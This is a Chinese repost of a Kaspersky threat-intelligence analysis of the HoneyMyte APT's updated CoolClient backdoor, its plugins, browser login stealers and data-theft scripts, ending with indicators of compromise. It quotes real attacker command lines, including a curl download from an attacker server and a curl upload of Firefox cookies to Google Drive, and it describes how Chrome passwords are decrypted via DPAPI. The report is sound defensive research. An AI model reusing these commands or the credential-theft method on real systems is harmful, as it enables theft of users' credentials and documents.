2026-01-29 10:38:45 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 卡巴斯基报告显示HoneyMyte近期更新了CoolClient后门，新增剪贴板监控与HTTP代理凭据嗅探功能。攻击者利用深信服软件进行DLL侧加载，并部署浏览器窃取程序及脚本窃取凭据和文档。建议加强监控相关恶意软件特征及C2通信，防范高级持续性威胁。 综合评分： 100 文章分类： 威胁情报,恶意软件,红队,逆向分析,数据泄露

cover_image

HoneyMyte 更新了 CoolClient，并在最近的活动中部署了多个窃取程序。

原创

卡巴斯基卡巴斯基

暗镜

2026年1月29日 00:06 北京

过去几年，我们一直在观察和监控HoneyMyte（又名Mustang Panda或Bronze President）在亚洲和欧洲的间谍活动，其中东南亚地区受影响最大。该组织的大部分行动主要针对政府机构。

作为APT组织，HoneyMyte使用多种复杂工具来实现其目标。这些工具包括ToneShell、PlugX、Qreverse和CoolClient后门，以及Tonedisk和SnakeDisk USB蠕虫等。2025年，我们观察到HoneyMyte更新了其工具集，通过增强CoolClient后门的功能、部署多个浏览器登录数据窃取程序变种以及使用多个用于数据窃取和侦察的脚本来实现这一目标。

有关此威胁的更多信息，包括入侵指标，可供卡巴斯基情报报告服务的客户获取。如有兴趣，请联系[email protected]。

CoolClient 后门

CoolClient 后门的早期版本最早由Sophos于 2022 年发现，TrendMicro随后在 2023 年记录了其更新版本。在我们最近的调查中，我们发现 CoolClient 已经发生了相当大的变化，开发者为该后门添加了多项新功能。在缅甸、蒙古、马来西亚和俄罗斯的多次攻击活动中，都发现了这一更新版本，它通常作为 PlugX 和LuminousMoth感染之外的辅助后门进行部署。

据我们观察，CoolClient 通常与加密的加载器文件一同分发，这些加载器文件包含加密的配置数据、shellcode 和内存中的下一阶段 DLL 模块。这些模块主要依赖 DLL 侧加载作为其执行方式，而 DLL 侧加载需要合法的签名可执行文件才能加载恶意 DLL。在 2021 年至 2025 年间，攻击者滥用了来自各种软件产品的签名二进制文件，包括 BitDefender、VLC 媒体播放器、Ulead PhotoImpact 和多个深信服 (Sangfor) 解决方案。

CoolClient 的变种利用不同的软件进行 DLL 侧加载（2021–2025）

本文分析的最新版酷客户端滥用了深信服开发的合法软件。以下概述了其运行方式。值得注意的是，除最终阶段的功能有所不同外，其行为在所有变体中均保持一致。

CoolClient 执行流程概述

然而，值得注意的是，在近期巴基斯坦和缅甸发生的另一起涉及该恶意软件的攻击活动中，我们发现 HoneyMyte 引入了一种新变种的 CoolClient，该变种会投放并执行一种此前未知的 rootkit。我们将在未来发布一份单独的报告，详细介绍与此 CoolClient 变种及其关联的 rootkit 相关的技术分析和发现。

CoolClient 功能

在功能方面，CoolClient 会收集详细的系统和用户信息。这些信息包括计算机名称、操作系统版本、总物理内存 (RAM)、网络详细信息（MAC 和 IP 地址）、已登录用户信息以及已加载驱动程序模块的描述和版本。此外，CoolClient 的新旧版本均支持向 C2 服务器上传文件、删除文件、键盘记录、TCP 隧道、反向代理监听以及插件暂存/执行（用于运行额外的内存模块）。这些功能在最新版本中仍然保留，并新增了一些功能。

在这个最新版本中，CoolClient 需要依赖几个重要文件才能正常运行：

第二阶段DLL中的参数模式

CoolClient 通常需要三个参数才能正常运行。这些参数决定了恶意软件应该执行哪些操作。支持以下参数。

| | | | — | — | | 范围 | 行动 | | 无参数 | · CoolClient 将启动一个带有安装参数的新进程。例如：Sang.exe install。 | | 安装 | * CoolClient 解密 time.dat。 * 为持久化机制向 Run 注册表添加新键。 * 创建一个名为 write.exe 的进程。 * 解密 loader.dat 并将其注入到新创建的 write.exe 进程中。 * 检查服务控制管理器 (SCM) 访问权限。 * 检查多个 AV 进程，例如 360sd.exe、zhudongfangyu.exe 和 360desktopservice64.exe。 * 安装并启动名为 media_updaten 的服务。 * 如果当前用户属于管理员组，则创建一个带有 passuac 参数的新进程来绕过 UAC。 | | 工作 | * 创建一个名为 write.exe 的进程。 * 将 loader.dat 解密并注入到新生成的 write.exe 进程中。 | | 帕苏阿克 | * 绕过用户帐户控制 (UAC) 并执行权限提升。 * 检查计算机是否运行 Windows 10 或更高版本。 * 通过伪造 PEB 信息来模仿 svchost.exe 进程。 * 创建一个名为 ComboxResetTask 的计划任务以实现持久化。该任务使用 work 参数执行恶意软件。 * 通过复制现有已提升权限进程的访问令牌，将权限提升至管理员级别。 |

最终阶段DLL

该write.exe进程解密并启动main.dat包含第三阶段（最终阶段）DLL 的文件。CoolClient 的核心功能都在此 DLL 中实现。启动时，它首先检查键盘记录器、剪贴板窃取器和 HTTP 代理凭据嗅探器是否已启用。如果已启用，CoolClient 将为每个特定功能创建一个新线程。值得注意的是，剪贴板窃取器和 HTTP 代理凭据嗅探器是旧版本中没有的新功能。

剪贴板和活动窗口监视器

CoolClient 中引入的一项新功能是剪贴板监控，它利用剪贴板窃取者通常滥用的函数（例如  GetClipboardDataclipboard\_get GetWindowTextW`…

CoolClient 还会使用 . 获取用户活动窗口的窗口标题、进程 ID 和当前时间戳GetWindowTextW API。这些信息使攻击者能够监控用户行为，识别正在使用的应用程序，并确定在给定时刻复制的数据的上下文。

使用字节密钥进行简单的 XOR 运算，对剪贴板内容和活动窗口信息进行加密0xAC，然后写入位于的文件C:\ProgramData\AppxProvisioning.xml。

HTTP代理凭据嗅探器

另一个值得注意的新功能是 CoolClient 能够从主机的 HTTP 流量数据包中提取 HTTP 代理凭据。为此，该恶意软件会创建专用线程来拦截和解析每个本地 IP 地址上的原始网络流量。一旦能够拦截和解析流量，CoolClient 便开始从恶意软件数据包嗅探器拦截的 HTTP 流量中提取代理身份验证凭据。

该函数通过分析原始 TCP 有效载荷来定位Proxy-Connection数据包头部，并确保数据包的相关性。然后，它查找Proxy-AuthorizationBasic 头部，提取并解码 Base64 编码的凭据，并将其保存在内存中，以便稍后发送到 C2 服务器。

用于从 HTTP 代理授权标头中查找和提取 Base64 编码凭据的函数

C2 命令处理程序

最新版本的 CoolClient 默认使用 TCP 作为主要的 C2 通信协议，但与之前的版本类似，它也提供了使用 UDP 的选项。每个传入的有效载荷都以一个四字节的“魔数”开头，用于标识命令族。但是，如果命令与下载和运行插件相关，则此值缺失。如果客户端收到一个没有可识别“魔数”的数据包，它将切换到插件模式（用于在内存中接收和执行插件模块的机制）进行命令处理。

0xFFAABBCC – 信标和配置命令

以下是用于管理客户端状态和信标的命令菜单：

| | | | — | — | | 命令 ID | 行动 | | 0x0 | 发送信标连接 | | 0x1 | 更新信标时间戳 | | 0x2 | 枚举活跃用户会话 | | 0x3 | 处理传入的C2命令 |

0xFFAABBCD – 操作命令

该命令组实现了数据窃取、代理设置和文件操作等功能。以下是已知子命令的详细说明：

| | | | — | — | | 命令 ID | 行动 | | 0x0 | 建立反向隧道连接 | | 0x1 | 通过隧道发送数据 | | 0x2 | 隧道连接处 | | 0x3 | 设置反向代理 | | 0x4 | 关闭特定套接字 | | 0x6 | 列出目录中的文件 | | 0x7 | 删除文件 | | 0x8 | 设置键盘记录器 | | 0x9 | 终止键盘记录器线程 | | 0xA | 获取剪贴板数据 | | 0xB | 安装剪贴板和活动窗口监视器 | | 0xC | 关闭剪贴板和活动窗口监视器 | | 0xD | 读取并发送文件 | | 0xE | 删除文件 |

CoolClient 插件

CoolClient 支持多个插件，每个插件都专注于特定的功能。我们最近的研究结果表明，HoneyMyte 组织在针对蒙古的攻击活动中积极使用了 CoolClient，攻击者FileMgrS.dll通过 C2 通道推送并执行了一个名为 CoolClient 的插件，用于文件管理操作。

在遥测数据中进一步寻找样本，我们发现了另外两个插件：一个提供远程 shell 功能（RemoteShellS.dll），另一个专注于服务管理（ServiceMgrS.dll）。

ServiceMgrS.dll – 服务管理插件

此插件用于管理受害主机上的服务。它可以枚举所有服务、创建新服务，甚至删除现有服务。下表列出了命令 ID 及其对应的操作。

| | | | — | — | | 命令 ID | 行动 | | 0x0 | 枚举服务 | | 0x1 / 0x4 | 开始或恢复服务 | | 0x2 | 停止服务 | | 0x3 | 暂停服务 | | 0x5 | 创建服务 | | 0x6 | 删除服务 | | 0x7 | 设置服务在启动时自动启动 | | 0x8 | 设置服务手动启动 | | 0x9 | 已禁用此服务 |

FileMgrS.dll – 文件管理插件

主CoolClient植入程序的操作命令已经支持一些基本的文件操作，例如列出目录内容和删除文件。但是，专用的文件管理插件提供了一整套文件管理功能。

| | | | — | — | | 命令 ID | 行动 | | 0x0 | 列出驱动器和网络资源 | | 0x1 | 列出文件夹中的文件 | | 0x2 | 删除文件或文件夹 | | 0x3 | 创建新文件夹 | | 0x4 | 移动文件 | | 0x5 | 读取文件 | | 0x6 | 将数据写入文件 | | 0x7 | 将文件或文件夹压缩成 ZIP 压缩包 | | 0x8 | 执行文件 | | 0x9 | 使用 certutil 下载并执行文件 | | 0xA | 搜索文件 | | 0xB | 发送搜索结果 | | 0xC | 映射网络驱动器 | | 0xD | 设置文件传输的数据块大小 | | 0xF | 批量复制或移动 | | 0x10 | 获取文件元数据 | | 0x11 | 设置文件元数据 |

RemoteShellS.dll – 远程 shell 插件

根据我们对主植入程序的分析，C2 命令处理程序并未实现远程 shell 功能。CoolClient 依赖于一个专用插件来实现此功能。该插件会生成一个隐藏cmd.exe进程，并通过管道重定向标准输入和输出，从而允许攻击者向该进程发送命令并捕获其输出。然后，该输出会被转发回 C2 服务器以进行远程交互。

浏览器登录数据窃取器

在调查源自泰国主机的可疑 ToneShell 后门流量时，我们发现 HoneyMyte 攻击者下载并执行了一个恶意软件样本，该样本旨在从 Chrome 浏览器中提取已保存的登录凭据，作为其后渗透活动的一部分。我们将此样本称为变种 A。同一天，攻击者还执行了另一个恶意软件样本（变种 B），该样本的目标是存储在 Microsoft Edge 浏览器中的凭据。这两个样本可以被视为同一恶意软件家族的成员。

在另一次针对 HoneyMyte 的 QReverse 后门的威胁搜寻行动中，我们发现了 Chrome 凭据解析器的另一个变种（变种 C），其代码与上述 ToneShell 活动中使用的样本有显著的相似性。

该恶意软件已在缅甸、马来西亚和泰国等国家被发现，尤其针对政府部门。

下表显示了 HoneyMyte 使用的浏览器凭据窃取程序的变体。

| | | | | | — | — | — | — | | 变体 | 目标浏览器 | 执行方法 | MD5哈希值 | | 一个 | 铬合金 | 直接执行（PE32） | 1A5A9C013CE1B65ABC75D809A25D36A7 | | B | 边缘 | 直接执行（PE32） | E1B7EF0F3AC0A0A64F86E220F362B149 | | C | 基于 Chium 内核的浏览器 | DLL侧加载 | DA6F89F15094FD3F74BA186954BE6B05 |

这些窃取程序可能是 HoneyMyte 在后渗透活动中使用的一种新型恶意软件工具集的一部分。

初始感染

作为利用 ToneShell 后门进行后渗透活动的一部分，攻击者最初执行了 A 型窃取程序，该程序旨在窃取 Chrome 凭据。然而，我们无法确定其部署的具体机制。

几分钟后，攻击者执行命令，从远程服务器下载并运行了 B 型窃取程序。该变种专门针对 Microsoft Edge 的凭据。

| | | | — | — | | | curl hxxp://45.144.165[.]65/BUIEFuiHFUEIuioKLWENFUoi878UIESf/MUEWGHui897hjkhsjdkHfjegfdh/67jksaebyut8seuhfjgfdgdfhet4SEDGF/Tools/getlogindataedge.exe -o “C:\users[username]\libraries\getloginedge.exe” |

在 Variant B 下载并执行的同一小时内，我们观察到攻击者发出另一条命令，使用curl命令将 Firefox 浏览器 cookie 文件 (cookies.sqlite) 导出到 Google Drive。

| | | | — | — | | | curl -XPOST-L-H”Authorization: Bearer ya29.a0Ad52N3-ZUcb-ixQT_Ts1MwvXsO9JwEYRujRROo-vwqmSW006YxrlFSRjTuUuAK-u8UiaQt7v0gQbjktpFZMp65hd2KBwnY2YdTXYAKhktWi-v1LIaEFYzImoO7p8Jp01t29_3JxJukd6IdpTLPdXrKINmnI9ZgqPTWicWN4aCgYKAQ4SARASFQHGX2MioNQPPZN8EkdbZNROAlzXeQ0174″ -F”metadata={name :’8059cookies.sqlite’};type=application/json;charset=UTF-8″-F”file=@”$appdata\Mozilla\Firefox\Profiles\i6bv8i9n.default-release\cookies.sqlite”;type=application/zip”-k”https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart” |

变体C分析

与使用硬编码文件路径的变体 A 和 B 不同，变体 C 窃取程序接受两个运行时参数：浏览器文件路径Login Data和Local State目标文件路径。这提供了更大的灵活性，使窃取程序能够针对任何基于 Chromium 的浏览器，例如 Chrome、Edge、Brave 或 Opera，而无需考虑用户配置文件或安装路径。以下是执行变体 C 的示例命令：

| | | | — | — | | | Jarte.exe”C:\Users[username]\AppData\Local\Google\Chrome\User Data\Default\Login Data””C:\Users[username]\AppData\Local\Google\Chrome\User Data\Local State” |

在此上下文中，该Login Data文件是一个 SQLite 数据库，用于存储已保存的网站登录凭据，包括用户名和 AES 加密的密码。该Local State文件是一个 JSON 格式的配置文件，包含浏览器元数据，其中最重要的值是  encrypted_key<key>，这是一个经过 Base64 编码的 AES 密钥。解密数据库中存储的密码需要用到此密钥Login Data，该密钥本身也经过加密。

执行时，恶意软件会将Login Data文件复制到用户的临时目录中chromeTmp

为了检索已保存的凭据，恶意软件会在复制的数据库上执行以下 SQL 查询：

| | | | — | — | | | SELECT origin_url,username_value,password_value FROM logins |

此查询返回每个已保存条目的登录 URL、存储的用户名和加密密码。

接下来，恶意软件读取Local State文件以提取浏览器的加密主密钥。该密钥受 Windows 数据保护 API (DPAPI) 保护，确保只有创建该加密数据的同一 Windows 用户帐户才能解密数据。然后，恶意软件使用该CryptUnprotectDataAPI 解密密钥，从而能够访问和解密Login DataSQLite 数据库中的密码条目。

恶意软件将解密后的 AES 密钥存储在内存中，然后对每个已保存的密码进行解密，并重建完整的登录记录。

最后，它将结果保存到文本文件中C:\Users\Public\Libraries\License.txt。

登录数据窃取者的归因

我们的调查显示，该恶意软件在 ToneShell 后门攻击活动中被持续使用，该活动被归咎于 HoneyMyte APT 组织。另一个佐证我们归因的因素是，浏览器凭证窃取程序似乎与 LuminousMoth APT 组织有关联，而 LuminousMoth 组织此前曾与 HoneyMyte 有关联。我们对 LuminousMoth 的 cookie 窃取程序的分析发现，其代码与 HoneyMyte 的凭证窃取程序存在多处相似之处。例如，这两个恶意软件家族都使用相同的方法将目标文件（例如Login Data and Cookies）复制到名为 <temp\_folder\_name> 的临时文件夹中ChromeTmp，这表明可能存在工具重用或共享代码库的情况。

两名窃贼都遵循相同的步骤：他们检查原始Login Data文件是否存在，找到临时文件夹，并将浏览器数据复制到同名文件中。

基于这些发现，我们有很高的把握认为 HoneyMyte 是这个浏览器凭证窃取程序的幕后黑手，并且与 LuminousMoth APT 组织有着密切的联系。

文件窃取和系统信息侦察脚本

在多次间谍活动中，HoneyMyte 使用多个脚本来收集系统信息、窃取文档并窃取浏览器登录数据。其中一个脚本是一个名为 . 的批处理文件1.bat。

1.bat – 系统枚举和数据泄露批处理脚本

脚本首先将文件下载curl.exe到rar.exe公共文件夹。这些工具用于文件传输和压缩。

然后它收集网络详细信息并下载，然后运行nbtscan tool内部网络扫描。

在枚举过程中，该脚本还会将存储的凭据、命令结果systeminfo、注册表项、启动文件夹列表、文件和文件夹列表以及防病毒信息等信息收集到一个名为的文件中log.dat。然后，它通过 FTP 将此文件上传到http://113.23.212[.]15/pub/。

接下来，它会删除这两个文件log.dat及其nbtscan可执行文件以清除痕迹。然后，脚本会终止浏览器进程，压缩浏览器相关文件夹，检索 FileZilla 配置文件，使用对所有驱动器中的文档进行归档rar.exe，并将收集到的数据上传到同一服务器。

最后，它会删除所有剩余的痕迹以掩盖其踪迹。

Ttraazcs32.ps1 – 基于 PowerShell 的数据收集和泄露工具

在 HoneyMyte 操作中观察到的第二个脚本是一个名为Ttraazcs32.ps1.

与批处理文件类似，此脚本会将文件下载到公共文件夹curl.exe，rar.exe以处理文件传输和压缩。它会收集计算机和用户信息，以及网络详细信息，例如公共 IP 地址和 Wi-Fi 网络数据。

收集到的所有信息都会写入一个文件，压缩成受密码保护的 RAR 存档，并通过 FTP 上传。

除了系统分析之外，该脚本还会搜索多个驱动器，包括C:\Users\Desktop“下载”文件夹以及 D 盘到 Z 盘，查找最近修改过的文档。目标文件类型包括.doc, .xls, .pdf, .tif.txt、.txt 和.txt.txt，特别是最近 60 天内修改过的文件。这些文件会被压缩到一个受密码保护的 RAR 压缩包中，并上传到同一台 FTP 服务器。

t.ps1 – 保存的登录数据收集和泄露

第三个归因于 HoneyMyte 的脚本是一个名为t.ps1.

该脚本需要一个数字作为参数，并在D:\temp指定目录下创建一个以该数字命名的工作目录。该数字与任何标识符无关，它仅仅是一个数字标签，可能用于受害者整理被盗数据。如果受害者的计算机上不存在 D 盘，则会在当前工作目录中创建新文件夹。

该脚本随后在系统中搜索 Chrome 和 Chromium 内核的浏览器文件，例如 .cd.htm 和Login Data``.cd.htm Local State。它会将这些文件复制到目标目录，并encrypted_key从中提取Local State密钥值。然后，它使用 Windows DPAPI（Windows DPAPI System.Security.Cryptography.ProtectedData）解密该密钥，并将解密后的 Base64 编码密钥写入Local State-journal同一目录下名为 .cd.htm 的新文件中。例如，如果原始文件为 .cd.htm C:\Users\$username \AppData\Local\Google\Chrome\User Data\Local State，则脚本会创建一个新文件 .cd.htm C:\Users\$username\AppData\Local\Google\Chrome\User Data\Local State-journal，攻击者稍后可以使用该文件访问存储的凭据。

凭证数据准备就绪后，脚本会验证这两个rar.exe文件curl.exe是否可用。如果不可用，脚本会直接从 Google 云端硬盘下载。然后，脚本会将收集到的数据压缩到一个受密码保护的存档文件（密码为“PIXELDRAIN”）中，并pixeldrain.com使用硬编码令牌通过 Pixeldrain 服务的 API 将其上传。Pixeldrain 是一个公共文件共享服务，攻击者会利用它窃取数据。

这种方法凸显了 HoneyMyte 转向使用公共文件共享服务来秘密窃取敏感数据，尤其是浏览器登录凭据。

结论

最新调查结果表明，HoneyMyte 仍在积极运行，部署了一套更新的工具集，其中包括 CoolClient 后门、浏览器登录数据窃取程序和各种文档窃取脚本。

HoneyMyte 的攻击活动似乎远远超出了传统的间谍目标，例如窃取文档和持久化数据，其功能包括键盘记录、剪贴板监控、代理凭证窃取、文档外泄、浏览器凭证收集以及大规模文件窃取。这些工具表明，攻击者正转向主动监控用户活动，包括捕获击键、收集剪贴板数据和获取代理凭证。

各组织应高度警惕HoneyMyte工具集（包括CoolClient后门）以及相关恶意软件家族（例如PlugX、ToneShell、Qreverse和LuminousMoth）的部署。这些行动是复杂威胁行为者策略的一部分，旨在持续访问受感染系统并进行高价值的监视活动。

妥协的迹象

CoolClient F518D8E5FE70D9090F6280C68A95998F libngs.dll 1A61564841BBBB8E7774CBBEB3C68D5D loader.dat AEB25C9A286EE4C25CA55B72A42EFA2C main.dat 6B7300A8B3F4AAC40EEECFD7BC47EE7C time.dat

CoolClient 插件 7AA53BA3E3F8B0453FFCFBA06347AB34 ServiceMgrS.dll A1CD59F769E9E5F6A040429847CA6EAE FileMgrS.dll 1BC5329969E6BF8EF2E9E49AAB003F0B RemoteShellS.dll

浏览器登录数据窃取程序 1A5A9C013CE1B65ABC75D809A25D36A7 变体 A E1B7EF0F3AC0A0A64F86E220F362B149 变体 B DA6F89F15094FD3F74BA186954BE6B05 变体 C

脚本 C19BD9E6F649DF1DF385DEEF94E0E8C4 1.bat 8 38B591722512368F81298C313E37412 Ttraazcs32.ps1 A4D7147F0B1CA737BFC133349841AABA t.ps1

CoolClient C2 account.hamsterxnxx[.]com popnike-share[.]com japan.Lenovoappstore[.]com

FTP 服务器 113.23.212[.]15

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：暗镜卡巴斯基卡巴斯基《HoneyMyte 更新了 CoolClient，并在最近的活动中部署了多个窃取程序。》